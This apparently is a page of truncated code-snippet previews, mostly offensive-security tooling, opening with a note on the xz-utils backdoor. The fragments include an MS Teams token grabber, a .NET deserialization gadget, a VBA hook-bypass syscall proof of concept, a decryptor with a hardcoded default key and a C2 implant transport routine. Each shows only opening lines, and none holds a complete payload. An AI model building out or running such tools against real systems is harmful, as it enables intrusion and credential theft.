This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that
| #!/usr/bin/python3 | |
| import requests | |
| import sys | |
| import uuid | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| #Disable annoying warnings about using burp proxy. | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| http_proxy = "http://127.0.0.1:8080" |
| %windir%\system32\WerFaultSecure.exe | |
| %windir%\system32\mrt.exe | |
| %windir%\system32\svchost.exe | |
| %windir%\system32\NETSTAT.EXE | |
| %windir%\system32\wbem\WmiPrvSE.exe | |
| %windir%\system32\DriverStore\FileRepository\*\NVWMI\nvWmi64.exe | |
| %programfiles(x86)%\Microsoft Intune Management Extension\ClientHealthEval.exe | |
| %programfiles(x86)%\Microsoft Intune Management Extension\SensorLogonTask.exe | |
| %programfiles(x86)%\Microsoft Intune Management Extension\Microsoft.Management.Services.IntuneWindowsAgent.exe | |
| %programdata%\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\*\OpenHandleCollector.exe |
| general: | |
| cloud_provider: aws | |
| attack_range_password: AW^@#^%&^#@## | |
| use_prebuilt_images_with_packer: '0' | |
| key_name: yourkey-001423 | |
| ip_whitelist: 8.8.8.8 #your public ip address | |
| attack_range_name: test-range | |
| aws: | |
| private_key_path: /Users/your/key-001423.key | |
| region: us-west-2 |
| // Obtain teams token - you can reuse it for GoMapEnum for example | |
| // Author: Juan Manuel Fernandez (@TheXC3LL) | |
| const puppeteer = require('puppeteer'); | |
| (async () => { | |
| console.log("\t\tMS Teams Token Generator - @TheXC3LL\n\n"); | |
| const username = process.argv[2]; | |
| const password = process.argv[3]; | |
| console.log("[*] Using credentials: %s:%s", username, password); |
| //All credit goes to Ysoserial.net and the great @tiraniddo | |
| //Snippets copied from ysoserial.net | |
| //https://thewover.github.io/Mixed-Assemblies/ - Great read! | |
| //https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.Serialization.Formatters.Binary; | |
| using System.IO; | |
| using System.Reflection; |
| ' Proof of Concept: retrieving SSN for syscalling in VBA | |
| ' Author: Juan Manuel Fernandez (@TheXC3LL) | |
| 'Based on: | |
| 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
| 'https://www.crummie5.club/freshycalls/ | |
| Private Type LARGE_INTEGER |
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations] | |
| "HighRiskFileTypes"=".appinstaller;.application;.appx;.appxbundle;.diagcab;.diagpkg;.diagcfg;.fluid;.fxb;.glb;.gltf;.library-ms;.loop;.msix;.partial;.perfmoncfg;.pko;.ply;.ppkg;.qds;.rat;.resmoncfg;.search-ms;.searchConnector-ms;.settingcontent-ms;.stl;.symlink;.theme;.themepack;.UDL;.url;.wab;.wbcat;.wcx;.website;.whiteboard;.xbap;.ZFSendToTarget;" |
| from hashlib import md5, sha1 | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.backends import default_backend | |
| from base64 import b64encode, b64decode | |
| import sys, time | |
| import requests | |
| DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8' | |
| class PanCrypt(): |
| BOOL TransportSend( LPVOID Data, SIZE_T Size, PVOID* RecvData, PSIZE_T RecvSize ) | |
| { | |
| #ifdef TRANSPORT_HTTP | |
| HANDLE hConnect = NULL; | |
| HANDLE hSession = NULL; | |
| HANDLE hRequest = NULL; | |
| DWORD HttpFlags = 0; | |
| LPVOID RespBuffer = NULL; |
